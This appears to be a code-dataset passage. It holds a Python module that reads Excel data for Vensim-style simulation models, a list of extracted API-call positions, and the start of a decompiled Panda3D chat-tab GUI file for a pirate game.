cls._Excels[file_name + sheet_name] = excel
return excel
@classmethod
def read_opyxl(cls, file_name):
"""
Read the Excel file using OpenPyXL or return the previously read one
"""
if file_name in cls._Excels_opyxl:
return cls._Excels_opyxl[file_name]
else:
excel = load_workbook(file_name, read_only=True, data_only=True)
cls._Excels_opyxl[file_name] = excel
return excel
@classmethod
def clean(cls):
"""
Clean the dictionary of read files
"""
cls._Excels, cls._Excels_opyxl = {}, {}
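# A minimal sketch of the caching behaviour (file and sheet names are
# illustrative, not part of the library):
#
#   data1 = Excels.read("inputs.xlsx", "Sheet1")   # read from disk
#   data2 = Excels.read("inputs.xlsx", "Sheet1")   # returned from the cache
#   Excels.clean()                                 # drop all cached workbooks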
class External(object):
"""
Main class of external objects
Attributes
----------
py_name: str
The python name of the object
    missing: str ("warning", "raise", "ignore", "keep")
What to do with missing values. If "warning" (default)
shows a warning message and interpolates the values.
If "raise" raises an error. If "ignore" interpolates
the values without showing anything. If "keep" it will keep
        the missing values; this option may cause the integration to
fail, but it may be used to check the quality of the data.
file: str
File name from which the data is read.
sheet: str
Sheet name from which the data is read.
"""
missing = "warning"
def __init__(self, py_name):
self.py_name = py_name
self.file = None
self.sheet = None
def __str__(self):
return self.py_name
def _get_data_from_file(self, rows, cols):
"""
Function to read data from excel file using rows and columns
Parameters
----------
rows: list of len 2
first row and last row+1 to be read, starting from 0
cols: list of len 2
first col and last col+1 to be read, starting from 0
Returns
-------
data: pandas.DataFrame, pandas.Series or float
depending on the shape of the requested data
"""
# TODO move to openpyxl to avoid pandas dependency in this file.
ext = os.path.splitext(self.file)[1].lower()
if ext in ['.xls', '.xlsx']:
# read data
data = Excels.read(
self.file,
self.sheet)[rows[0]:rows[1], cols[0]:cols[1]].copy()
shape = data.shape
# if it is a single row remove its dimension
if shape[1] == 1:
data = data[:, 0]
if shape[0] == 1:
data = data[0]
return data
raise NotImplementedError(self.py_name + "\n"
+ "The files with extension "
+ ext + " are not implemented")
def _get_data_from_file_opyxl(self, cellname):
"""
Function to read data from excel file using cell range name
Parameters
----------
cellname: str
the cell range name
Returns
-------
data: numpy.ndarray or float
depending on the shape of the requested data
"""
# read data
excel = Excels.read_opyxl(self.file)
try:
# Get the local id of the sheet
# needed for searching in locals names
# need to lower the sheetnames as Vensim has no case sensitivity
sheetId = [sheetname_wb.lower() for sheetname_wb
in excel.sheetnames].index(self.sheet.lower())
except ValueError:
# Error if it is not able to get the localSheetId
raise ValueError(self.py_name + "\n"
+ "The sheet doesn't exist...\n"
+ self._file_sheet)
try:
# Search for local and global names
cellrange = excel.defined_names.get(cellname, sheetId)\
or excel.defined_names.get(cellname)
coordinates = cellrange.destinations
for sheet, cells in coordinates:
if sheet.lower() == self.sheet.lower():
values = excel[sheet][cells]
try:
return np.array(
[[i.value if not isinstance(i.value, str)
else np.nan for i in j] for j in values],
dtype=float)
except TypeError:
return float(values.value)
raise AttributeError
except (KeyError, AttributeError):
# key error if the cellrange doesn't exist in the file or sheet
raise AttributeError(
self.py_name + "\n"
+ "The cell range name:\t {}\n".format(cellname)
+ "Doesn't exist in:\n" + self._file_sheet
)
def _get_series_data(self, series_across, series_row_or_col, cell, size):
"""
        Function that reads series and data from the Excel file for
        DATA and LOOKUPS.
Parameters
----------
series_across: "row", "column" or "name"
The way to read series file.
series_row_or_col: int or str
If series_across is "row" the row number where the series data is.
If series_across is "column" the column name where
the series data is.
If series_across is "name" the cell range name where
the series data is.
cell:
            If series_across is not "name", the top left cell where
the data table starts.
Else the name of the cell range where the data is.
size:
The size of the 2nd dimension of the data.
Returns
-------
series, data: ndarray (1D), ndarray(1D/2D)
The values of the series and data.
"""
if series_across == "row":
# Horizontal data (dimension values in a row)
# get the dimension values
first_row, first_col = self._split_excel_cell(cell)
series = self._get_data_from_file(
rows=[int(series_row_or_col)-1, int(series_row_or_col)],
cols=[first_col, None])
# read data
data = self._get_data_from_file(
rows=[first_row, first_row + size],
cols=[first_col, None]).transpose()
elif series_across == "column":
# Vertical data (dimension values in a column)
# get the dimension values
first_row, first_col = self._split_excel_cell(cell)
series_col = self._col_to_num(series_row_or_col)
series = self._get_data_from_file(
rows=[first_row, None],
cols=[series_col, series_col+1])
# read data
data = self._get_data_from_file(
rows=[first_row, None],
cols=[first_col, first_col + size])
else:
# get series data
series = self._get_data_from_file_opyxl(series_row_or_col)
if isinstance(series, float):
series = np.array([[series]])
series_shape = series.shape
if series_shape[0] == 1:
# horizontal definition of lookup/time dimension
series = series[0]
transpose = True
elif series_shape[1] == 1:
# vertical definition of lookup/time dimension
series = series[:, 0]
transpose = False
else:
# Error if the lookup/time dimension is 2D
                raise ValueError(
                    self.py_name + "\n"
                    + "Dimension given in:\n"
                    + self._file_sheet
                    + "\tDimension name:"
                    + "\t{}\n".format(series_row_or_col)
                    + " is a table and not a vector"
                )
# get data
data = self._get_data_from_file_opyxl(cell)
if isinstance(data, float):
data = np.array([[data]])
if transpose:
# transpose for horizontal definition of dimension
data = data.transpose()
if data.shape[0] != len(series):
raise ValueError(
self.py_name + "\n"
+ "Dimension and data given in:\n"
+ self._file_sheet
+ "\tDimension name:\t{}\n".format(series_row_or_col)
+ "\tData name:\t{}\n".format(cell)
+ " don't have the same length in the 1st dimension"
)
if data.shape[1] != size:
# Given coordinates length is different than
# the lentgh of 2nd dimension
raise ValueError(
self.py_name + "\n"
+ "Data given in:\n"
+ self._file_sheet
+ "\tData name:\t{}\n".format(cell)
+ " has not the same size as the given coordinates"
)
if data.shape[1] == 1:
# remove second dimension of data if its shape is (N, 1)
data = data[:, 0]
return series, data
def _resolve_file(self, root=None, possible_ext=None):
possible_ext = possible_ext or\
['', '.xls', '.xlsx', '.odt', '.txt', '.tab']
if self.file[0] == '?':
self.file = os.path.join(root, self.file[1:])
if not os.path.isfile(self.file):
for ext in possible_ext:
if os.path.isfile(self.file + ext):
self.file = self.file + ext
return
# raise FileNotFoundError(self.file)
# python2 compatibility
raise IOError("File Not Found: " + self.file)
else:
return
def _initialize_data(self, element_type):
"""
Initialize one element of DATA or LOOKUPS
Parameters
----------
element_type: str
"lookup" for LOOKUPS, "data" for data.
Returns
-------
data: xarray.DataArray
Dataarray with the time or interpolation dimension
as first dimension.
"""
self._resolve_file(root=self.root)
series_across = self._series_selector(self.x_row_or_col, self.cell)
size = utils.compute_shape(self.coords, reshape_len=1,
py_name=self.py_name)[0]
series, data = self._get_series_data(
series_across=series_across,
series_row_or_col=self.x_row_or_col,
cell=self.cell, size=size
)
# remove nan or missing values from dimension
if series_across != "name":
# Remove last nans only if the method is to read by row or col
i = 0
try:
while np.isnan(series[i-1]):
i -= 1
except IndexError:
# series has len 0
raise ValueError(
self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " has length 0"
)
if i != 0:
series = series[:i]
data = data[:i]
# warning/error if missing data in the series
if any(np.isnan(series)) and self.missing != "keep":
valid_values = ~np.isnan(series)
series = series[valid_values]
data = data[valid_values]
if self.missing == "warning":
warnings.warn(
self.py_name + "\n"
+ "Dimension value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " the corresponding data value(s) to the "
+ "missing/non-valid value(s) will be ignored\n\n"
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Dimension value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
)
# Check that the lookup/time dimension is strictly monotonic
if np.any(np.diff(series) <= 0) and self.missing != "keep":
raise ValueError(self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " is not strictly monotonous")
# Check for missing values in data
if np.any(np.isnan(data)) and self.missing != "keep":
if series_across == "name":
cell_type = "Cellrange"
else:
cell_type = "Reference cell"
if self.missing == "warning":
# Fill missing values with the chosen interpolation method,
# which is what Vensim does at runtime for DATA
warnings.warn(
self.py_name + "\n"
+ "Data value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
+ " the corresponding value will be filled "
+ "with the interpolation method of the object.\n\n"
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Data value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
# fill values
self._fill_missing(series, data)
reshape_dims = tuple([len(series)] + utils.compute_shape(self.coords))
if len(reshape_dims) > 1:
data = self._reshape(data, reshape_dims)
if element_type == "lookup":
dim_name = "lookup_dim"
else:
dim_name = "time"
data = xr.DataArray(
data=data,
coords={dim_name: series, **self.coords},
dims=[dim_name] + list(self.coords)
)
return data
def _fill_missing(self, series, data):
"""
Fills missing values in data read from Excel. Mutates the values in data.
Parameters
----------
series:
the time series without missing values
data:
the data with missing values
Returns
-------
None
"""
# locate missing values; if data is 2D, interpolate each column separately
datanan = np.isnan(data)
if len(data.shape) == 1:
data[datanan] = self._interpolate_missing(
series[datanan],
series[~datanan],
data[~datanan])
else:
for i, nanlist in enumerate(list(datanan.transpose())):
data[nanlist, i] = self._interpolate_missing(
series[nanlist],
series[~nanlist],
data[~nanlist][:, i])
def _interpolate_missing(self, x, xr, yr):
"""
Interpolates a list of missing values from _fill_missing
Parameters
----------
x:
list of x values with missing data to interpolate
xr:
non-missing x values
yr:
non-missing y values
Returns
-------
y:
Result after interpolating x with self.interp method
"""
y = np.empty_like(x, dtype=float)
for i, value in enumerate(x):
if self.interp == "raw":
y[i] = np.nan
elif value >= xr[-1]:
y[i] = yr[-1]
elif value <= xr[0]:
y[i] = yr[0]
elif self.interp == 'look forward':
y[i] = yr[xr >= value][0]
elif self.interp == 'hold backward':
y[i] = yr[xr <= value][-1]
else:
y[i] = np.interp(value, xr, yr)
return y
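# Illustrative sketch (added for clarity, not in the original module): with
# xr=[1, 2, 3] and yr=[10, 20, 30], a missing point at x=2.5 gives 25 for
# interp="interpolate", 30 for 'look forward', 20 for 'hold backward' and
# NaN for "raw"; values outside [1, 3] are clamped to the edge values.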
@property
def _file_sheet(self):
"""
Returns file and sheet name in a string
"""
return "\tFile name:\t{}\n".format(self.file)\
+ "\tSheet name:\t{}\n".format(self.sheet)
@staticmethod
def _col_to_num(col):
"""
Transforms an Excel column name into a zero-based column index
Parameters
----------
col: str
Column name
Returns
-------
int
Column number
"""
if len(col) == 1:
return ord(col.upper()) - ord('A')
elif len(col) == 2:
left = ord(col[0].upper()) - ord('A') + 1
right = ord(col[1].upper()) - ord('A')
return left * (ord('Z')-ord('A')+1) + right
else:
left = ord(col[0].upper()) - ord('A') + 1
center = ord(col[1].upper()) - ord('A') + 1
right = ord(col[2].upper()) - ord('A')
return left * ((ord('Z')-ord('A')+1)**2)\
+ center * (ord('Z')-ord('A')+1)\
+ right
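# Quick sanity examples (added for clarity; outputs are zero-based as the
# code above implies): _col_to_num("A") -> 0, _col_to_num("Z") -> 25,
# _col_to_num("AA") -> 26, _col_to_num("AC") -> 28.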
def _split_excel_cell(self, cell):
"""
Splits a cell value given in a string.
Returns None for non-valid cell formats.
Parameters
----------
cell: str
Cell-like string, such as "A1", "b16", "AC19"...
If it is not a cell-like string, None will be returned.
Returns
-------
row number, column number: int, int
If the cell input is valid. Both numbers are given in Python
enumeration, i.e., first row and first column are 0.
"""
split = re.findall(r'\d+|\D+', cell)
try:
# check that we only have two values [column, row]
assert len(split) == 2
# check that the column name has no special characters
assert not re.compile('[^a-zA-Z]+').search(split[0])
# check that row number is not 0
assert int(split[1]) != 0
# the column name has as maximum 3 letters
assert len(split[0]) <= 3
return int(split[1])-1, self._col_to_num(split[0])
except AssertionError:
return
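# Example behaviour (illustrative only): "A1" -> (0, 0), "b16" -> (15, 1),
# "AC19" -> (18, 28); malformed inputs such as "1A" or "A0" return None.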
@staticmethod
def _reshape(data, dims):
"""
Reshapes a pandas.DataFrame, pandas.Series, xarray.DataArray
or np.ndarray to the given dimensions.
Parameters
----------
data: xarray.DataArray/numpy.ndarray
Data to be reshaped
dims: tuple
The dimensions to reshape.
Returns
-------
numpy.ndarray
reshaped array
"""
try:
data = data.values
except AttributeError:
pass
return data.reshape(dims)
def _series_selector(self, x_row_or_col, cell):
"""
Selects whether series data (DATA/LOOKUPS) should be read by column,
by row or by cellrange name,
based on the input format of x_row_or_col and cell.
The format of the 2 variables must be consistent.
Parameters
----------
x_row_or_col: str
String of a number if the series is given in a row, a column letter if
it is given in a column, or a name if it is given by cellrange name.
cell: str
Cell identifier, such as "A1", or name if the data is given
by cellrange name.
Returns
-------
series_across: str
"row" if series is given in a row
"column" if series is given in a column
"name" if series and data are given by range name
"""
try:
# if x_row_or_col is numeric the series must be a row
int(x_row_or_col)
return "row"
except ValueError:
if self._split_excel_cell(cell):
# if the cell can be split, the format is "A1"-like,
# so the series must be a column
return "column"
else:
return "name"
class ExtData(External):
"""
Class for Vensim GET XLS DATA/GET DIRECT DATA
"""
def __init__(self, file_name, sheet, time_row_or_col, cell,
interp, coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.time_row_or_cols = [time_row_or_col]
self.cells = [cell]
self.coordss = [coords]
self.root = root
self.interp = interp
# check if the interpolation method is valid
if not interp:
self.interp = "interpolate"
if self.interp not in ["interpolate", "raw",
"look forward", "hold backward"]:
raise ValueError(self.py_name + "\n"
+ " The interpolation method (interp) must be "
+ "'raw', 'interpolate', "
+ "'look forward' or 'hold backward")
def add(self, file_name, sheet, time_row_or_col, cell,
interp, coords):
"""
Add information to retrieve a new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.time_row_or_cols.append(time_row_or_col)
self.cells.append(cell)
self.coordss.append(coords)
if not interp:
interp = "interpolate"
if interp != self.interp:
raise ValueError(self.py_name + "\n"
+ "Error matching interpolation method with "
+ "previously defined one")
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.time_row_or_cols,
self.cells, self.coordss)
for (self.file, self.sheet, self.x_row_or_col,
self.cell, self.coords) in zipped:
data.append(self._initialize_data("data"))
self.data = utils.xrmerge(data)
def __call__(self, time):
if time in self.data['time'].values:
outdata = self.data.sel(time=time)
elif self.interp == "raw":
return np.nan
elif time > self.data['time'].values[-1]:
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the time")
outdata = self.data[-1]
elif time < self.data['time'].values[0]:
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the time")
outdata = self.data[0]
elif self.interp == "interpolate":
outdata = self.data.interp(time=time)
elif self.interp == 'look forward':
outdata = self.data.sel(time=time, method="backfill")
elif self.interp == 'hold backward':
outdata = self.data.sel(time=time, method="pad")
if self.coordss[0]:
# Remove time coord from the DataArray
return outdata.reset_coords('time', drop=True)
else:
# if data has no coords, return a float
return float(outdata)
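# Minimal usage sketch (hypothetical file/sheet/cell names, not taken from
# any real model): an ExtData object is built once, optionally extended
# with add(), initialized, and then called with a model time, e.g.:
#
# ext = ExtData(file_name="?input.xlsx", sheet="Sheet1",
#               time_row_or_col="4", cell="B5", interp="interpolate",
#               coords={}, root="/model/dir", py_name="ext_data_demo")
# ext.initialize()
# value_at_t10 = ext(10)
#
# With empty coords the call returns a float; the leading "?" makes
# _resolve_file join the file name with the given root directory.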
class ExtLookup(External):
"""
Class for Vensim GET XLS LOOKUPS/GET DIRECT LOOKUPS
"""
def __init__(self, file_name, sheet, x_row_or_col, cell,
coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.x_row_or_cols = [x_row_or_col]
self.cells = [cell]
self.root = root
self.coordss = [coords]
self.interp = "interpolate"
def add(self, file_name, sheet, x_row_or_col, cell, coords):
"""
Add information to retrieve a new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.x_row_or_cols.append(x_row_or_col)
self.cells.append(cell)
self.coordss.append(coords)
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.x_row_or_cols,
self.cells, self.coordss)
for (self.file, self.sheet, self.x_row_or_col,
self.cell, self.coords) in zipped:
data.append(self._initialize_data("lookup"))
self.data = utils.xrmerge(data)
def __call__(self, x):
return self._call(self.data, x)
def _call(self, data, x):
if isinstance(x, xr.DataArray):
if not x.dims:
# shape 0 xarrays
return self._call(data, float(x))
if np.all(x > data['lookup_dim'].values[-1]):
outdata, _ = xr.broadcast(data[-1], x)
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the series")
elif np.all(x < data['lookup_dim'].values[0]):
outdata, _ = xr.broadcast(data[0], x)
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the series")
else:
data, _ = xr.broadcast(data, x)
outdata = data[0].copy()
for a in utils.xrsplit(x):
outdata.loc[a.coords] = self._call(data.loc[a.coords],
float(a))
# the output will always be an xarray
return outdata.reset_coords('lookup_dim', drop=True)
else:
if x in data['lookup_dim'].values:
outdata = data.sel(lookup_dim=x)
elif x > data['lookup_dim'].values[-1]:
outdata = data[-1]
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the series")
elif x < data['lookup_dim'].values[0]:
outdata = data[0]
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the series")
else:
outdata = data.interp(lookup_dim=x)
# the output could be a float or an xarray
if self.coordss[0]:
# Remove lookup dimension coord from the DataArray
return outdata.reset_coords('lookup_dim', drop=True)
else:
# if the lookup has no coords, return a float
return float(outdata)
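# Usage note (illustrative): after initialize(), an ExtLookup is called with
# the lookup-dimension value rather than the simulation time, e.g.
# lookup_obj(3.5) interpolates along "lookup_dim"; passing an
# xarray.DataArray of x values broadcasts the lookup over its coordinates.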
class ExtConstant(External):
"""
Class for Vensim GET XLS CONSTANTS/GET DIRECT CONSTANTS
"""
def __init__(self, file_name, sheet, cell, coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.transposes = [cell[-1] == '*']
self.cells = [cell.strip('*')]
self.root = root
self.coordss = [coords]
def add(self, file_name, sheet, cell, coords):
"""
Add information to retrieve a new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.transposes.append(cell[-1] == '*')
self.cells.append(cell.strip('*'))
self.coordss.append(coords)
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.transposes,
self.cells, self.coordss)
for (self.file, self.sheet, self.transpose,
self.cell, self.coords) in zipped:
data.append(self._initialize())
self.data = utils.xrmerge(data)
def _initialize(self):
"""
Initialize one element
"""
self._resolve_file(root=self.root)
split = self._split_excel_cell(self.cell)
if split:
data_across = "cell"
cell = split
else:
data_across = "name"
cell = self.cell
shape = utils.compute_shape(self.coords, reshape_len=2,
py_name=self.py_name)
if self.transpose:
shape.reverse()
data = self._get_constant_data(data_across, cell, shape)
if self.transpose:
data = data.transpose()
if np.any(np.isnan(data)):
# nan values in data
if data_across == "name":
cell_type = "Cellrange"
else:
cell_type = "Reference cell"
if self.missing == "warning":
warnings.warn(
self.py_name + "\n"
+ "Constant value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Constant value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
# Create only an xarray if the data is not 0 dimensional
if len(self.coords) > 0:
reshape_dims = tuple(utils.compute_shape(self.coords))
if len(reshape_dims) > 1:
data = self._reshape(data, reshape_dims)
data = xr.DataArray(
data=data, coords=self.coords, dims=list(self.coords)
)
return data
def _get_constant_data(self, data_across, cell, shape):
"""
Function that reads data from an Excel file for CONSTANT
Parameters
----------
data_across: "cell" or "name"
The way to read data file.
cell: int or str
If data_across is "cell" the lefttop split cell value where
the data is.
If data_across is "name" the cell range name where the data is.
shape:
The shape of the data in 2D.
Returns
-------
data: float/ndarray(1D/2D)
The values of the data.
"""
if data_across == "cell":
# read data starting from the top-left cell using pandas
start_row, start_col = cell
return self._get_data_from_file(
rows=[start_row, start_row + shape[0]],
cols=[start_col, start_col + shape[1]])
else:
# read data from cell range name using OpenPyXL
data = self._get_data_from_file_opyxl(cell)
try:
# Remove length=1 axis
data_shape = data.shape
if data_shape[1] == 1:
data = data[:, 0]
if data_shape[0] == 1:
data = data[0]
except AttributeError:
# Data is a float, nothing to do
pass
# Check data dims
try:
if shape[0] == 1 and shape[1] != 1:
assert shape[1] == len(data)
elif shape[0] != 1 and shape[1] == 1:
assert shape[0] == len(data)
elif shape[0] == 1 and shape[1] == 1:
assert isinstance(data, float)
else:
assert tuple(shape) == data.shape
except AssertionError:
raise ValueError(self.py_name + "\n"
+ "Data given in:\n"
+ self._file_sheet
+ "\tData name:\t{}\n".format(cell)
+ " has not the same shape as the"
+ " given coordinates")
return data
def __call__(self):
return self.data
class ExtSubscript(External):
"""
Class for Vensim GET XLS SUBSCRIPT/GET DIRECT SUBSCRIPT
"""
def __init__(self, file_name, sheet, firstcell, lastcell, prefix, root):
super().__init__("Hardcoded external subscript")
self.file = file_name
self.sheet = sheet
self._resolve_file(root=root)
row_first, col_first = self._split_excel_cell(firstcell)
row_last, col_last = self._split_excel_cell(lastcell)
data = pd.read_excel(
self.file, sheet,
skiprows=row_first-1,
nrows=row_last-row_first+1,
usecols=np.arange(col_first, col_last+1)
)
self.subscript = [prefix + str(d) for d in data.values.flatten()]
| [((16001, 16015), 'numpy.isnan', 'np.isnan', (['data'], {}), '(data)\n', (16009, 16015), True, 'import numpy as np\n'), ((16902, 16931), 'numpy.empty_like', 'np.empty_like', (['x'], {'dtype': 'float'}), '(x, dtype=float)\n', (16915, 16931), True, 'import numpy as np\n'), ((19042, 19071), 're.findall', 're.findall', (['"""\\\\d+|\\\\D+"""', 'cell'], {}), "('\\\\d+|\\\\D+', cell)\n", (19052, 19071), False, 'import re\n'), ((1349, 1405), 'openpyxl.load_workbook', 'load_workbook', (['file_name'], {'read_only': '(True)', 'data_only': '(True)'}), '(file_name, read_only=True, data_only=True)\n', (1362, 1405), False, 'from openpyxl import load_workbook\n'), ((10559, 10592), 'os.path.join', 'os.path.join', (['root', 'self.file[1:]'], {}), '(root, self.file[1:])\n', (10571, 10592), False, 'import os\n'), ((10609, 10634), 'os.path.isfile', 'os.path.isfile', (['self.file'], {}), '(self.file)\n', (10623, 10634), False, 'import os\n'), ((26592, 26633), 'numpy.all', 'np.all', (["(x > data['lookup_dim'].values[-1])"], {}), "(x > data['lookup_dim'].values[-1])\n", (26598, 26633), True, 'import numpy as np\n'), ((30529, 30543), 'numpy.isnan', 'np.isnan', (['data'], {}), '(data)\n', (30537, 30543), True, 'import numpy as np\n'), ((10692, 10723), 'os.path.isfile', 'os.path.isfile', (['(self.file + ext)'], {}), '(self.file + ext)\n', (10706, 10723), False, 'import os\n'), ((12025, 12048), 'numpy.isnan', 'np.isnan', (['series[i - 1]'], {}), '(series[i - 1])\n', (12033, 12048), True, 'import numpy as np\n'), ((12600, 12616), 'numpy.isnan', 'np.isnan', (['series'], {}), '(series)\n', (12608, 12616), True, 'import numpy as np\n'), ((12674, 12690), 'numpy.isnan', 'np.isnan', (['series'], {}), '(series)\n', (12682, 12690), True, 'import numpy as np\n'), ((13977, 13991), 'numpy.isnan', 'np.isnan', (['data'], {}), '(data)\n', (13985, 13991), True, 'import numpy as np\n'), ((26664, 26689), 'xarray.broadcast', 'xr.broadcast', (['data[-1]', 'x'], {}), '(data[-1], x)\n', (26676, 26689), True, 'import xarray as xr\n'), ((26706, 26805), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' +\n 'extrapolating data above the maximum value of the series')"], {}), "(self.py_name + '\\n' +\n 'extrapolating data above the maximum value of the series')\n", (26719, 26805), False, 'import warnings\n'), ((26856, 26896), 'numpy.all', 'np.all', (["(x < data['lookup_dim'].values[0])"], {}), "(x < data['lookup_dim'].values[0])\n", (26862, 26896), True, 'import numpy as np\n'), ((34649, 34683), 'numpy.arange', 'np.arange', (['col_first', '(col_last + 1)'], {}), '(col_first, col_last + 1)\n', (34658, 34683), True, 'import numpy as np\n'), ((835, 869), 'pandas.to_numeric', 'pd.to_numeric', (['ex'], {'errors': '"""coerce"""'}), "(ex, errors='coerce')\n", (848, 869), True, 'import pandas as pd\n'), ((3158, 3185), 'os.path.splitext', 'os.path.splitext', (['self.file'], {}), '(self.file)\n', (3174, 3185), False, 'import os\n'), ((8183, 8203), 'numpy.array', 'np.array', (['[[series]]'], {}), '([[series]])\n', (8191, 8203), True, 'import numpy as np\n'), ((9144, 9162), 'numpy.array', 'np.array', (['[[data]]'], {}), '([[data]])\n', (9152, 9162), True, 'import numpy as np\n'), ((13609, 13624), 'numpy.diff', 'np.diff', (['series'], {}), '(series)\n', (13616, 13624), True, 'import numpy as np\n'), ((23945, 24042), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' + 'extrapolating data above the maximum value of the time'\n )"], {}), "(self.py_name + '\\n' +\n 'extrapolating data above the maximum value of the time')\n", (23958, 
24042), False, 'import warnings\n'), ((26927, 26951), 'xarray.broadcast', 'xr.broadcast', (['data[0]', 'x'], {}), '(data[0], x)\n', (26939, 26951), True, 'import xarray as xr\n'), ((26968, 27067), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' +\n 'extrapolating data below the minimum value of the series')"], {}), "(self.py_name + '\\n' +\n 'extrapolating data below the minimum value of the series')\n", (26981, 27067), False, 'import warnings\n'), ((27145, 27166), 'xarray.broadcast', 'xr.broadcast', (['data', 'x'], {}), '(data, x)\n', (27157, 27166), True, 'import xarray as xr\n'), ((27713, 27812), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' +\n 'extrapolating data above the maximum value of the series')"], {}), "(self.py_name + '\\n' +\n 'extrapolating data above the maximum value of the series')\n", (27726, 27812), False, 'import warnings\n'), ((19272, 19296), 're.compile', 're.compile', (['"""[^a-zA-Z]+"""'], {}), "('[^a-zA-Z]+')\n", (19282, 19296), False, 'import re\n'), ((24165, 24262), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' + 'extrapolating data below the minimum value of the time'\n )"], {}), "(self.py_name + '\\n' +\n 'extrapolating data below the minimum value of the time')\n", (24178, 24262), False, 'import warnings\n'), ((27947, 28046), 'warnings.warn', 'warnings.warn', (["(self.py_name + '\\n' +\n 'extrapolating data below the minimum value of the series')"], {}), "(self.py_name + '\\n' +\n 'extrapolating data below the minimum value of the series')\n", (27960, 28046), False, 'import warnings\n'), ((912, 961), 'pandas.read_excel', 'pd.read_excel', (['file_name', 'sheet_name'], {'header': 'None'}), '(file_name, sheet_name, header=None)\n', (925, 961), True, 'import pandas as pd\n'), ((17386, 17410), 'numpy.interp', 'np.interp', (['value', 'xr', 'yr'], {}), '(value, xr, yr)\n', (17395, 17410), True, 'import numpy as np\n')] |
ksmit799/POTCO-PS | pirates/piratesgui/ChatBar.py | 520d38935ae8df4b452c733a82c94dddac01e275 | # File: C (Python 2.4)
from direct.gui.DirectGui import *
from direct.interval.IntervalGlobal import *
from direct.fsm.FSM import FSM
from direct.showbase.PythonUtil import Functor
from pandac.PandaModules import *
from pirates.piratesbase import PiratesGlobals
from pirates.piratesbase import PLocalizer
from pirates.piratesgui import PiratesGuiGlobals
from pirates.piratesgui.TabBar import TopTab, TabBar
class ChatTab(TopTab):
def __init__(self, tabBar, name, text_xyz = None, **kw):
optiondefs = (('modelName', 'general_frame_c', None), ('frameSize', (0, 0.22, 0.0, 0.10000000000000001), None), ('borderScale', 0.13500000000000001, None), ('bgBuffer', 0.14000000000000001, None), ('label', '', None), ('textMayChange', 1, None))
self.defineoptions(kw, optiondefs)
TopTab.__init__(self, tabBar, name, **kw)
self.initialiseoptions(ChatTab)
text_pos = (0.11700000000000001, 0.040000000000000001, 0)
if text_xyz:
text_pos = text_xyz
self.myTextScale = PiratesGuiGlobals.TextScaleLarge * 1.1000000000000001
self.myLabel = DirectLabel(parent = self, relief = None, state = DGG.DISABLED, text = self['label'], text_scale = self.myTextScale, text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = text_pos, text_font = PiratesGlobals.getInterfaceFont(), textMayChange = 1)
def destroy(self):
self.myLabel = None
TopTab.destroy(self)
def setBoxWidth(self, percentage):
iPercentage = 1.0 / percentage
self.myLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
class ChatTabBar(TabBar):
def refreshTabs(self):
for (x, name) in enumerate(self.tabOrder):
tab = self.tabs[name]
tab.setPos(0.070000000000000007 + 0.19500000000000001 * (x + self.offset), 0, 0.059999999999999998)
tab.reparentTo(self.bParent)
for name in reversed(self.tabOrder):
tab = self.tabs[name]
tab.reparentTo(self.bParent)
self.activeIndex = max(0, min(self.activeIndex, len(self.tabOrder) - 1))
if len(self.tabOrder):
name = self.tabOrder[self.activeIndex]
tab = self.tabs[name]
tab.reparentTo(self.fParent)
tab.setZ(0.076999999999999999)
def makeTab(self, name, **kw):
return ChatTab(self, name, **kw)
def stash(self):
TabBar.stash(self)
def setBoxWidth(self, percentage):
for key in self.tabs:
self.tabs[key].setBoxWidth(percentage)
class WhisperTab(TopTab):
def __init__(self, tabBar, name, **kw):
